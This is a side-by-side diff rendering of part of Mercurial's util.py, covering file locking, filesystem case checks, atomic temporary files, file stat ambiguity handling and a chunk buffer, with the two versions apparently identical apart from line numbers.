1732 timer = time.perf_counter
1730 timer = time.perf_counter
1733
1731
1734 def makelock(info, pathname):
1732 def makelock(info, pathname):
1735 """Create a lock file atomically if possible
1733 """Create a lock file atomically if possible
1736
1734
1737 This may leave a stale lock file if symlink isn't supported and signal
1735 This may leave a stale lock file if symlink isn't supported and signal
1738 interrupt is enabled.
1736 interrupt is enabled.
1739 """
1737 """
1740 try:
1738 try:
1741 return os.symlink(info, pathname)
1739 return os.symlink(info, pathname)
1742 except OSError as why:
1740 except OSError as why:
1743 if why.errno == errno.EEXIST:
1741 if why.errno == errno.EEXIST:
1744 raise
1742 raise
1745 except AttributeError: # no symlink in os
1743 except AttributeError: # no symlink in os
1746 pass
1744 pass
1747
1745
1748 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1746 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1749 ld = os.open(pathname, flags)
1747 ld = os.open(pathname, flags)
1750 os.write(ld, info)
1748 os.write(ld, info)
1751 os.close(ld)
1749 os.close(ld)
1752
1750
1753 def readlock(pathname):
1751 def readlock(pathname):
1754 try:
1752 try:
1755 return os.readlink(pathname)
1753 return os.readlink(pathname)
1756 except OSError as why:
1754 except OSError as why:
1757 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1755 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1758 raise
1756 raise
1759 except AttributeError: # no symlink in os
1757 except AttributeError: # no symlink in os
1760 pass
1758 pass
1761 fp = posixfile(pathname, 'rb')
1759 fp = posixfile(pathname, 'rb')
1762 r = fp.read()
1760 r = fp.read()
1763 fp.close()
1761 fp.close()
1764 return r
1762 return r
1765
1763
1766 def fstat(fp):
1764 def fstat(fp):
1767 '''stat file object that may not have fileno method.'''
1765 '''stat file object that may not have fileno method.'''
1768 try:
1766 try:
1769 return os.fstat(fp.fileno())
1767 return os.fstat(fp.fileno())
1770 except AttributeError:
1768 except AttributeError:
1771 return os.stat(fp.name)
1769 return os.stat(fp.name)
1772
1770
1773 # File system features
1771 # File system features
1774
1772
1775 def fscasesensitive(path):
1773 def fscasesensitive(path):
1776 """
1774 """
1777 Return true if the given path is on a case-sensitive filesystem
1775 Return true if the given path is on a case-sensitive filesystem
1778
1776
1779 Requires a path (like /foo/.hg) ending with a foldable final
1777 Requires a path (like /foo/.hg) ending with a foldable final
1780 directory component.
1778 directory component.
1781 """
1779 """
1782 s1 = os.lstat(path)
1780 s1 = os.lstat(path)
1783 d, b = os.path.split(path)
1781 d, b = os.path.split(path)
1784 b2 = b.upper()
1782 b2 = b.upper()
1785 if b == b2:
1783 if b == b2:
1786 b2 = b.lower()
1784 b2 = b.lower()
1787 if b == b2:
1785 if b == b2:
1788 return True # no evidence against case sensitivity
1786 return True # no evidence against case sensitivity
1789 p2 = os.path.join(d, b2)
1787 p2 = os.path.join(d, b2)
1790 try:
1788 try:
1791 s2 = os.lstat(p2)
1789 s2 = os.lstat(p2)
1792 if s2 == s1:
1790 if s2 == s1:
1793 return False
1791 return False
1794 return True
1792 return True
1795 except OSError:
1793 except OSError:
1796 return True
1794 return True
1797
1795
1798 try:
1796 try:
1799 import re2
1797 import re2
1800 _re2 = None
1798 _re2 = None
1801 except ImportError:
1799 except ImportError:
1802 _re2 = False
1800 _re2 = False
1803
1801
1804 class _re(object):
1802 class _re(object):
1805 def _checkre2(self):
1803 def _checkre2(self):
1806 global _re2
1804 global _re2
1807 try:
1805 try:
1808 # check if match works, see issue3964
1806 # check if match works, see issue3964
1809 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1807 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1810 except ImportError:
1808 except ImportError:
1811 _re2 = False
1809 _re2 = False
1812
1810
1813 def compile(self, pat, flags=0):
1811 def compile(self, pat, flags=0):
1814 '''Compile a regular expression, using re2 if possible
1812 '''Compile a regular expression, using re2 if possible
1815
1813
1816 For best performance, use only re2-compatible regexp features. The
1814 For best performance, use only re2-compatible regexp features. The
1817 only flags from the re module that are re2-compatible are
1815 only flags from the re module that are re2-compatible are
1818 IGNORECASE and MULTILINE.'''
1816 IGNORECASE and MULTILINE.'''
1819 if _re2 is None:
1817 if _re2 is None:
1820 self._checkre2()
1818 self._checkre2()
1821 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1819 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1822 if flags & remod.IGNORECASE:
1820 if flags & remod.IGNORECASE:
1823 pat = '(?i)' + pat
1821 pat = '(?i)' + pat
1824 if flags & remod.MULTILINE:
1822 if flags & remod.MULTILINE:
1825 pat = '(?m)' + pat
1823 pat = '(?m)' + pat
1826 try:
1824 try:
1827 return re2.compile(pat)
1825 return re2.compile(pat)
1828 except re2.error:
1826 except re2.error:
1829 pass
1827 pass
1830 return remod.compile(pat, flags)
1828 return remod.compile(pat, flags)
1831
1829
1832 @propertycache
1830 @propertycache
1833 def escape(self):
1831 def escape(self):
1834 '''Return the version of escape corresponding to self.compile.
1832 '''Return the version of escape corresponding to self.compile.
1835
1833
1836 This is imperfect because whether re2 or re is used for a particular
1834 This is imperfect because whether re2 or re is used for a particular
1837 function depends on the flags, etc, but it's the best we can do.
1835 function depends on the flags, etc, but it's the best we can do.
1838 '''
1836 '''
1839 global _re2
1837 global _re2
1840 if _re2 is None:
1838 if _re2 is None:
1841 self._checkre2()
1839 self._checkre2()
1842 if _re2:
1840 if _re2:
1843 return re2.escape
1841 return re2.escape
1844 else:
1842 else:
1845 return remod.escape
1843 return remod.escape
1846
1844
1847 re = _re()
1845 re = _re()
1848
1846
1849 _fspathcache = {}
1847 _fspathcache = {}
1850 def fspath(name, root):
1848 def fspath(name, root):
1851 '''Get name in the case stored in the filesystem
1849 '''Get name in the case stored in the filesystem
1852
1850
1853 The name should be relative to root, and be normcase-ed for efficiency.
1851 The name should be relative to root, and be normcase-ed for efficiency.
1854
1852
1855 Note that this function is unnecessary, and should not be
1853 Note that this function is unnecessary, and should not be
1856 called, for case-sensitive filesystems (simply because it's expensive).
1854 called, for case-sensitive filesystems (simply because it's expensive).
1857
1855
1858 The root should be normcase-ed, too.
1856 The root should be normcase-ed, too.
1859 '''
1857 '''
1860 def _makefspathcacheentry(dir):
1858 def _makefspathcacheentry(dir):
1861 return dict((normcase(n), n) for n in os.listdir(dir))
1859 return dict((normcase(n), n) for n in os.listdir(dir))
1862
1860
1863 seps = pycompat.ossep
1861 seps = pycompat.ossep
1864 if pycompat.osaltsep:
1862 if pycompat.osaltsep:
1865 seps = seps + pycompat.osaltsep
1863 seps = seps + pycompat.osaltsep
1866 # Protect backslashes. This gets silly very quickly.
1864 # Protect backslashes. This gets silly very quickly.
1867 seps.replace('\\','\\\\')
1865 seps.replace('\\','\\\\')
1868 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1866 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1869 dir = os.path.normpath(root)
1867 dir = os.path.normpath(root)
1870 result = []
1868 result = []
1871 for part, sep in pattern.findall(name):
1869 for part, sep in pattern.findall(name):
1872 if sep:
1870 if sep:
1873 result.append(sep)
1871 result.append(sep)
1874 continue
1872 continue
1875
1873
1876 if dir not in _fspathcache:
1874 if dir not in _fspathcache:
1877 _fspathcache[dir] = _makefspathcacheentry(dir)
1875 _fspathcache[dir] = _makefspathcacheentry(dir)
1878 contents = _fspathcache[dir]
1876 contents = _fspathcache[dir]
1879
1877
1880 found = contents.get(part)
1878 found = contents.get(part)
1881 if not found:
1879 if not found:
1882 # retry "once per directory" per "dirstate.walk" which
1880 # retry "once per directory" per "dirstate.walk" which
1883 # may take place for each patches of "hg qpush", for example
1881 # may take place for each patches of "hg qpush", for example
1884 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1882 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1885 found = contents.get(part)
1883 found = contents.get(part)
1886
1884
1887 result.append(found or part)
1885 result.append(found or part)
1888 dir = os.path.join(dir, part)
1886 dir = os.path.join(dir, part)
1889
1887
1890 return ''.join(result)
1888 return ''.join(result)
1891
1889
1892 def checknlink(testfile):
1890 def checknlink(testfile):
1893 '''check whether hardlink count reporting works properly'''
1891 '''check whether hardlink count reporting works properly'''
1894
1892
1895 # testfile may be open, so we need a separate file for checking to
1893 # testfile may be open, so we need a separate file for checking to
1896 # work around issue2543 (or testfile may get lost on Samba shares)
1894 # work around issue2543 (or testfile may get lost on Samba shares)
1897 f1, f2, fp = None, None, None
1895 f1, f2, fp = None, None, None
1898 try:
1896 try:
1899 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1897 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1900 suffix='1~', dir=os.path.dirname(testfile))
1898 suffix='1~', dir=os.path.dirname(testfile))
1901 os.close(fd)
1899 os.close(fd)
1902 f2 = '%s2~' % f1[:-2]
1900 f2 = '%s2~' % f1[:-2]
1903
1901
1904 oslink(f1, f2)
1902 oslink(f1, f2)
1905 # nlinks() may behave differently for files on Windows shares if
1903 # nlinks() may behave differently for files on Windows shares if
1906 # the file is open.
1904 # the file is open.
1907 fp = posixfile(f2)
1905 fp = posixfile(f2)
1908 return nlinks(f2) > 1
1906 return nlinks(f2) > 1
1909 except OSError:
1907 except OSError:
1910 return False
1908 return False
1911 finally:
1909 finally:
1912 if fp is not None:
1910 if fp is not None:
1913 fp.close()
1911 fp.close()
1914 for f in (f1, f2):
1912 for f in (f1, f2):
1915 try:
1913 try:
1916 if f is not None:
1914 if f is not None:
1917 os.unlink(f)
1915 os.unlink(f)
1918 except OSError:
1916 except OSError:
1919 pass
1917 pass
1920
1918
1921 def endswithsep(path):
1919 def endswithsep(path):
1922 '''Check path ends with os.sep or os.altsep.'''
1920 '''Check path ends with os.sep or os.altsep.'''
1923 return (path.endswith(pycompat.ossep)
1921 return (path.endswith(pycompat.ossep)
1924 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1922 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1925
1923
1926 def splitpath(path):
1924 def splitpath(path):
1927 '''Split path by os.sep.
1925 '''Split path by os.sep.
1928 Note that this function does not use os.altsep because this is
1926 Note that this function does not use os.altsep because this is
1929 an alternative of simple "xxx.split(os.sep)".
1927 an alternative of simple "xxx.split(os.sep)".
1930 It is recommended to use os.path.normpath() before using this
1928 It is recommended to use os.path.normpath() before using this
1931 function if need.'''
1929 function if need.'''
1932 return path.split(pycompat.ossep)
1930 return path.split(pycompat.ossep)
1933
1931
1934 def mktempcopy(name, emptyok=False, createmode=None):
1932 def mktempcopy(name, emptyok=False, createmode=None):
1935 """Create a temporary file with the same contents from name
1933 """Create a temporary file with the same contents from name
1936
1934
1937 The permission bits are copied from the original file.
1935 The permission bits are copied from the original file.
1938
1936
1939 If the temporary file is going to be truncated immediately, you
1937 If the temporary file is going to be truncated immediately, you
1940 can use emptyok=True as an optimization.
1938 can use emptyok=True as an optimization.
1941
1939
1942 Returns the name of the temporary file.
1940 Returns the name of the temporary file.
1943 """
1941 """
1944 d, fn = os.path.split(name)
1942 d, fn = os.path.split(name)
1945 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1943 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1946 os.close(fd)
1944 os.close(fd)
1947 # Temporary files are created with mode 0600, which is usually not
1945 # Temporary files are created with mode 0600, which is usually not
1948 # what we want. If the original file already exists, just copy
1946 # what we want. If the original file already exists, just copy
1949 # its mode. Otherwise, manually obey umask.
1947 # its mode. Otherwise, manually obey umask.
1950 copymode(name, temp, createmode)
1948 copymode(name, temp, createmode)
1951 if emptyok:
1949 if emptyok:
1952 return temp
1950 return temp
1953 try:
1951 try:
1954 try:
1952 try:
1955 ifp = posixfile(name, "rb")
1953 ifp = posixfile(name, "rb")
1956 except IOError as inst:
1954 except IOError as inst:
1957 if inst.errno == errno.ENOENT:
1955 if inst.errno == errno.ENOENT:
1958 return temp
1956 return temp
1959 if not getattr(inst, 'filename', None):
1957 if not getattr(inst, 'filename', None):
1960 inst.filename = name
1958 inst.filename = name
1961 raise
1959 raise
1962 ofp = posixfile(temp, "wb")
1960 ofp = posixfile(temp, "wb")
1963 for chunk in filechunkiter(ifp):
1961 for chunk in filechunkiter(ifp):
1964 ofp.write(chunk)
1962 ofp.write(chunk)
1965 ifp.close()
1963 ifp.close()
1966 ofp.close()
1964 ofp.close()
1967 except: # re-raises
1965 except: # re-raises
1968 try:
1966 try:
1969 os.unlink(temp)
1967 os.unlink(temp)
1970 except OSError:
1968 except OSError:
1971 pass
1969 pass
1972 raise
1970 raise
1973 return temp
1971 return temp
1974
1972
1975 class filestat(object):
1973 class filestat(object):
1976 """help to exactly detect change of a file
1974 """help to exactly detect change of a file
1977
1975
1978 'stat' attribute is result of 'os.stat()' if specified 'path'
1976 'stat' attribute is result of 'os.stat()' if specified 'path'
1979 exists. Otherwise, it is None. This can avoid preparative
1977 exists. Otherwise, it is None. This can avoid preparative
1980 'exists()' examination on client side of this class.
1978 'exists()' examination on client side of this class.
1981 """
1979 """
1982 def __init__(self, stat):
1980 def __init__(self, stat):
1983 self.stat = stat
1981 self.stat = stat
1984
1982
1985 @classmethod
1983 @classmethod
1986 def frompath(cls, path):
1984 def frompath(cls, path):
1987 try:
1985 try:
1988 stat = os.stat(path)
1986 stat = os.stat(path)
1989 except OSError as err:
1987 except OSError as err:
1990 if err.errno != errno.ENOENT:
1988 if err.errno != errno.ENOENT:
1991 raise
1989 raise
1992 stat = None
1990 stat = None
1993 return cls(stat)
1991 return cls(stat)
1994
1992
1995 @classmethod
1993 @classmethod
1996 def fromfp(cls, fp):
1994 def fromfp(cls, fp):
1997 stat = os.fstat(fp.fileno())
1995 stat = os.fstat(fp.fileno())
1998 return cls(stat)
1996 return cls(stat)
1999
1997
2000 __hash__ = object.__hash__
1998 __hash__ = object.__hash__
2001
1999
2002 def __eq__(self, old):
2000 def __eq__(self, old):
2003 try:
2001 try:
2004 # if ambiguity between stat of new and old file is
2002 # if ambiguity between stat of new and old file is
2005 # avoided, comparison of size, ctime and mtime is enough
2003 # avoided, comparison of size, ctime and mtime is enough
2006 # to exactly detect change of a file regardless of platform
2004 # to exactly detect change of a file regardless of platform
2007 return (self.stat.st_size == old.stat.st_size and
2005 return (self.stat.st_size == old.stat.st_size and
2008 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2006 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2009 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2007 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2010 except AttributeError:
2008 except AttributeError:
2011 pass
2009 pass
2012 try:
2010 try:
2013 return self.stat is None and old.stat is None
2011 return self.stat is None and old.stat is None
2014 except AttributeError:
2012 except AttributeError:
2015 return False
2013 return False
2016
2014
2017 def isambig(self, old):
2015 def isambig(self, old):
2018 """Examine whether new (= self) stat is ambiguous against old one
2016 """Examine whether new (= self) stat is ambiguous against old one
2019
2017
2020 "S[N]" below means stat of a file at N-th change:
2018 "S[N]" below means stat of a file at N-th change:
2021
2019
2022 - S[n-1].ctime < S[n].ctime: can detect change of a file
2020 - S[n-1].ctime < S[n].ctime: can detect change of a file
2023 - S[n-1].ctime == S[n].ctime
2021 - S[n-1].ctime == S[n].ctime
2024 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2022 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2025 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2023 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2026 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2024 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2027 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2025 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2028
2026
2029 Case (*2) above means that a file was changed twice or more at
2027 Case (*2) above means that a file was changed twice or more at
2030 same time in sec (= S[n-1].ctime), and comparison of timestamp
2028 same time in sec (= S[n-1].ctime), and comparison of timestamp
2031 is ambiguous.
2029 is ambiguous.
2032
2030
2033 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2031 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2034 timestamp is ambiguous".
2032 timestamp is ambiguous".
2035
2033
2036 But advancing mtime only in case (*2) doesn't work as
2034 But advancing mtime only in case (*2) doesn't work as
2037 expected, because naturally advanced S[n].mtime in case (*1)
2035 expected, because naturally advanced S[n].mtime in case (*1)
2038 might be equal to manually advanced S[n-1 or earlier].mtime.
2036 might be equal to manually advanced S[n-1 or earlier].mtime.
2039
2037
2040 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2038 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2041 treated as ambiguous regardless of mtime, to avoid overlooking
2039 treated as ambiguous regardless of mtime, to avoid overlooking
2042 by confliction between such mtime.
2040 by confliction between such mtime.
2043
2041
2044 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2042 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2045 S[n].mtime", even if size of a file isn't changed.
2043 S[n].mtime", even if size of a file isn't changed.
2046 """
2044 """
2047 try:
2045 try:
2048 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2046 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2049 except AttributeError:
2047 except AttributeError:
2050 return False
2048 return False
2051
2049
2052 def avoidambig(self, path, old):
2050 def avoidambig(self, path, old):
2053 """Change file stat of specified path to avoid ambiguity
2051 """Change file stat of specified path to avoid ambiguity
2054
2052
2055 'old' should be previous filestat of 'path'.
2053 'old' should be previous filestat of 'path'.
2056
2054
2057 This skips avoiding ambiguity, if a process doesn't have
2055 This skips avoiding ambiguity, if a process doesn't have
2058 appropriate privileges for 'path'. This returns False in this
2056 appropriate privileges for 'path'. This returns False in this
2059 case.
2057 case.
2060
2058
2061 Otherwise, this returns True, as "ambiguity is avoided".
2059 Otherwise, this returns True, as "ambiguity is avoided".
2062 """
2060 """
2063 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2061 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2064 try:
2062 try:
2065 os.utime(path, (advanced, advanced))
2063 os.utime(path, (advanced, advanced))
2066 except OSError as inst:
2064 except OSError as inst:
2067 if inst.errno == errno.EPERM:
2065 if inst.errno == errno.EPERM:
2068 # utime() on the file created by another user causes EPERM,
2066 # utime() on the file created by another user causes EPERM,
2069 # if a process doesn't have appropriate privileges
2067 # if a process doesn't have appropriate privileges
2070 return False
2068 return False
2071 raise
2069 raise
2072 return True
2070 return True
2073
2071
2074 def __ne__(self, other):
2072 def __ne__(self, other):
2075 return not self == other
2073 return not self == other
2076
2074
2077 class atomictempfile(object):
2075 class atomictempfile(object):
2078 '''writable file object that atomically updates a file
2076 '''writable file object that atomically updates a file
2079
2077
2080 All writes will go to a temporary copy of the original file. Call
2078 All writes will go to a temporary copy of the original file. Call
2081 close() when you are done writing, and atomictempfile will rename
2079 close() when you are done writing, and atomictempfile will rename
2082 the temporary copy to the original name, making the changes
2080 the temporary copy to the original name, making the changes
2083 visible. If the object is destroyed without being closed, all your
2081 visible. If the object is destroyed without being closed, all your
2084 writes are discarded.
2082 writes are discarded.
2085
2083
2086 checkambig argument of constructor is used with filestat, and is
2084 checkambig argument of constructor is used with filestat, and is
2087 useful only if target file is guarded by any lock (e.g. repo.lock
2085 useful only if target file is guarded by any lock (e.g. repo.lock
2088 or repo.wlock).
2086 or repo.wlock).
2089 '''
2087 '''
2090 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2088 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2091 self.__name = name # permanent name
2089 self.__name = name # permanent name
2092 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2090 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2093 createmode=createmode)
2091 createmode=createmode)
2094 self._fp = posixfile(self._tempname, mode)
2092 self._fp = posixfile(self._tempname, mode)
2095 self._checkambig = checkambig
2093 self._checkambig = checkambig
2096
2094
2097 # delegated methods
2095 # delegated methods
2098 self.read = self._fp.read
2096 self.read = self._fp.read
2099 self.write = self._fp.write
2097 self.write = self._fp.write
2100 self.seek = self._fp.seek
2098 self.seek = self._fp.seek
2101 self.tell = self._fp.tell
2099 self.tell = self._fp.tell
2102 self.fileno = self._fp.fileno
2100 self.fileno = self._fp.fileno
2103
2101
2104 def close(self):
2102 def close(self):
2105 if not self._fp.closed:
2103 if not self._fp.closed:
2106 self._fp.close()
2104 self._fp.close()
2107 filename = localpath(self.__name)
2105 filename = localpath(self.__name)
2108 oldstat = self._checkambig and filestat.frompath(filename)
2106 oldstat = self._checkambig and filestat.frompath(filename)
2109 if oldstat and oldstat.stat:
2107 if oldstat and oldstat.stat:
2110 rename(self._tempname, filename)
2108 rename(self._tempname, filename)
2111 newstat = filestat.frompath(filename)
2109 newstat = filestat.frompath(filename)
2112 if newstat.isambig(oldstat):
2110 if newstat.isambig(oldstat):
2113 # stat of changed file is ambiguous to original one
2111 # stat of changed file is ambiguous to original one
2114 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2112 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2115 os.utime(filename, (advanced, advanced))
2113 os.utime(filename, (advanced, advanced))
2116 else:
2114 else:
2117 rename(self._tempname, filename)
2115 rename(self._tempname, filename)
2118
2116
2119 def discard(self):
2117 def discard(self):
2120 if not self._fp.closed:
2118 if not self._fp.closed:
2121 try:
2119 try:
2122 os.unlink(self._tempname)
2120 os.unlink(self._tempname)
2123 except OSError:
2121 except OSError:
2124 pass
2122 pass
2125 self._fp.close()
2123 self._fp.close()
2126
2124
2127 def __del__(self):
2125 def __del__(self):
2128 if safehasattr(self, '_fp'): # constructor actually did something
2126 if safehasattr(self, '_fp'): # constructor actually did something
2129 self.discard()
2127 self.discard()
2130
2128
2131 def __enter__(self):
2129 def __enter__(self):
2132 return self
2130 return self
2133
2131
2134 def __exit__(self, exctype, excvalue, traceback):
2132 def __exit__(self, exctype, excvalue, traceback):
2135 if exctype is not None:
2133 if exctype is not None:
2136 self.discard()
2134 self.discard()
2137 else:
2135 else:
2138 self.close()
2136 self.close()
2139
2137
2140 def unlinkpath(f, ignoremissing=False):
2138 def unlinkpath(f, ignoremissing=False):
2141 """unlink and remove the directory if it is empty"""
2139 """unlink and remove the directory if it is empty"""
2142 if ignoremissing:
2140 if ignoremissing:
2143 tryunlink(f)
2141 tryunlink(f)
2144 else:
2142 else:
2145 unlink(f)
2143 unlink(f)
2146 # try removing directories that might now be empty
2144 # try removing directories that might now be empty
2147 try:
2145 try:
2148 removedirs(os.path.dirname(f))
2146 removedirs(os.path.dirname(f))
2149 except OSError:
2147 except OSError:
2150 pass
2148 pass
2151
2149
2152 def tryunlink(f):
2150 def tryunlink(f):
2153 """Attempt to remove a file, ignoring ENOENT errors."""
2151 """Attempt to remove a file, ignoring ENOENT errors."""
2154 try:
2152 try:
2155 unlink(f)
2153 unlink(f)
2156 except OSError as e:
2154 except OSError as e:
2157 if e.errno != errno.ENOENT:
2155 if e.errno != errno.ENOENT:
2158 raise
2156 raise
2159
2157
2160 def makedirs(name, mode=None, notindexed=False):
2158 def makedirs(name, mode=None, notindexed=False):
2161 """recursive directory creation with parent mode inheritance
2159 """recursive directory creation with parent mode inheritance
2162
2160
2163 Newly created directories are marked as "not to be indexed by
2161 Newly created directories are marked as "not to be indexed by
2164 the content indexing service", if ``notindexed`` is specified
2162 the content indexing service", if ``notindexed`` is specified
2165 for "write" mode access.
2163 for "write" mode access.
2166 """
2164 """
2167 try:
2165 try:
2168 makedir(name, notindexed)
2166 makedir(name, notindexed)
2169 except OSError as err:
2167 except OSError as err:
2170 if err.errno == errno.EEXIST:
2168 if err.errno == errno.EEXIST:
2171 return
2169 return
2172 if err.errno != errno.ENOENT or not name:
2170 if err.errno != errno.ENOENT or not name:
2173 raise
2171 raise
2174 parent = os.path.dirname(os.path.abspath(name))
2172 parent = os.path.dirname(os.path.abspath(name))
2175 if parent == name:
2173 if parent == name:
2176 raise
2174 raise
2177 makedirs(parent, mode, notindexed)
2175 makedirs(parent, mode, notindexed)
2178 try:
2176 try:
2179 makedir(name, notindexed)
2177 makedir(name, notindexed)
2180 except OSError as err:
2178 except OSError as err:
2181 # Catch EEXIST to handle races
2179 # Catch EEXIST to handle races
2182 if err.errno == errno.EEXIST:
2180 if err.errno == errno.EEXIST:
2183 return
2181 return
2184 raise
2182 raise
2185 if mode is not None:
2183 if mode is not None:
2186 os.chmod(name, mode)
2184 os.chmod(name, mode)
2187
2185
2188 def readfile(path):
2186 def readfile(path):
2189 with open(path, 'rb') as fp:
2187 with open(path, 'rb') as fp:
2190 return fp.read()
2188 return fp.read()
2191
2189
2192 def writefile(path, text):
2190 def writefile(path, text):
2193 with open(path, 'wb') as fp:
2191 with open(path, 'wb') as fp:
2194 fp.write(text)
2192 fp.write(text)
2195
2193
2196 def appendfile(path, text):
2194 def appendfile(path, text):
2197 with open(path, 'ab') as fp:
2195 with open(path, 'ab') as fp:
2198 fp.write(text)
2196 fp.write(text)
2199
2197
2200 class chunkbuffer(object):
2198 class chunkbuffer(object):
2201 """Allow arbitrary sized chunks of data to be efficiently read from an
2199 """Allow arbitrary sized chunks of data to be efficiently read from an
2202 iterator over chunks of arbitrary size."""
2200 iterator over chunks of arbitrary size."""
2203
2201
2204 def __init__(self, in_iter):
2202 def __init__(self, in_iter):
2205 """in_iter is the iterator that's iterating over the input chunks."""
2203 """in_iter is the iterator that's iterating over the input chunks."""
2206 def splitbig(chunks):
2204 def splitbig(chunks):
2207 for chunk in chunks:
2205 for chunk in chunks:
2208 if len(chunk) > 2**20:
2206 if len(chunk) > 2**20:
2209 pos = 0
2207 pos = 0
2210 while pos < len(chunk):
2208 while pos < len(chunk):
2211 end = pos + 2 ** 18
2209 end = pos + 2 ** 18
2212 yield chunk[pos:end]
2210 yield chunk[pos:end]
2213 pos = end
2211 pos = end
2214 else:
2212 else:
2215 yield chunk
2213 yield chunk
2216 self.iter = splitbig(in_iter)
2214 self.iter = splitbig(in_iter)
2217 self._queue = collections.deque()
2215 self._queue = collections.deque()
2218 self._chunkoffset = 0
2216 self._chunkoffset = 0
2219
2217
2220 def read(self, l=None):
2218 def read(self, l=None):
2221 """Read L bytes of data from the iterator of chunks of data.
2219 """Read L bytes of data from the iterator of chunks of data.
2222 Returns less than L bytes if the iterator runs dry.
2220 Returns less than L bytes if the iterator runs dry.
2223
2221
2224 If size parameter is omitted, read everything"""
2222 If size parameter is omitted, read everything"""
2225 if l is None:
2223 if l is None:
2226 return ''.join(self.iter)
2224 return ''.join(self.iter)
2227
2225
2228 left = l
2226 left = l
2229 buf = []
2227 buf = []
2230 queue = self._queue
2228 queue = self._queue
2231 while left > 0:
2229 while left > 0:
2232 # refill the queue
2230 # refill the queue
2233 if not queue:
2231 if not queue:
2234 target = 2**18
2232 target = 2**18
2235 for chunk in self.iter:
2233 for chunk in self.iter:
2236 queue.append(chunk)
2234 queue.append(chunk)
2237 target -= len(chunk)
2235 target -= len(chunk)
2238 if target <= 0:
2236 if target <= 0:
2239 break
2237 break
2240 if not queue:
2238 if not queue:
2241 break
2239 break
2242
2240
2243 # The easy way to do this would be to queue.popleft(), modify the
2241 # The easy way to do this would be to queue.popleft(), modify the
2244 # chunk (if necessary), then queue.appendleft(). However, for cases
2242 # chunk (if necessary), then queue.appendleft(). However, for cases
2245 # where we read partial chunk content, this incurs 2 dequeue
2243 # where we read partial chunk content, this incurs 2 dequeue
2246 # mutations and creates a new str for the remaining chunk in the
2244 # mutations and creates a new str for the remaining chunk in the
2247 # queue. Our code below avoids this overhead.
2245 # queue. Our code below avoids this overhead.
2248
2246
2249 chunk = queue[0]
2247 chunk = queue[0]
2250 chunkl = len(chunk)
2248 chunkl = len(chunk)
2251 offset = self._chunkoffset
2249 offset = self._chunkoffset
2252
2250
2253 # Use full chunk.
2251 # Use full chunk.
2254 if offset == 0 and left >= chunkl:
2252 if offset == 0 and left >= chunkl:
2255 left -= chunkl
2253 left -= chunkl
2256 queue.popleft()
2254 queue.popleft()
2257 buf.append(chunk)
2255 buf.append(chunk)
2258 # self._chunkoffset remains at 0.
2256 # self._chunkoffset remains at 0.
2259 continue
2257 continue
2260
2258
2261 chunkremaining = chunkl - offset
2259 chunkremaining = chunkl - offset
2262
2260
2263 # Use all of unconsumed part of chunk.
2261 # Use all of unconsumed part of chunk.
2264 if left >= chunkremaining:
2262 if left >= chunkremaining:
2265 left -= chunkremaining
2263 left -= chunkremaining
2266 queue.popleft()
2264 queue.popleft()
2267 # offset == 0 is enabled by block above, so this won't merely
2265 # offset == 0 is enabled by block above, so this won't merely
2268 # copy via ``chunk[0:]``.
2266 # copy via ``chunk[0:]``.
2269 buf.append(chunk[offset:])
2267 buf.append(chunk[offset:])
2270 self._chunkoffset = 0
2268 self._chunkoffset = 0
2271
2269
2272 # Partial chunk needed.
2270 # Partial chunk needed.
2273 else:
2271 else:
2274 buf.append(chunk[offset:offset + left])
2272 buf.append(chunk[offset:offset + left])
2275 self._chunkoffset += left
2273 self._chunkoffset += left
2276 left -= chunkremaining
2274 left -= chunkremaining
2277
2275
2278 return ''.join(buf)
2276 return ''.join(buf)
2279
2277
2280 def filechunkiter(f, size=131072, limit=None):
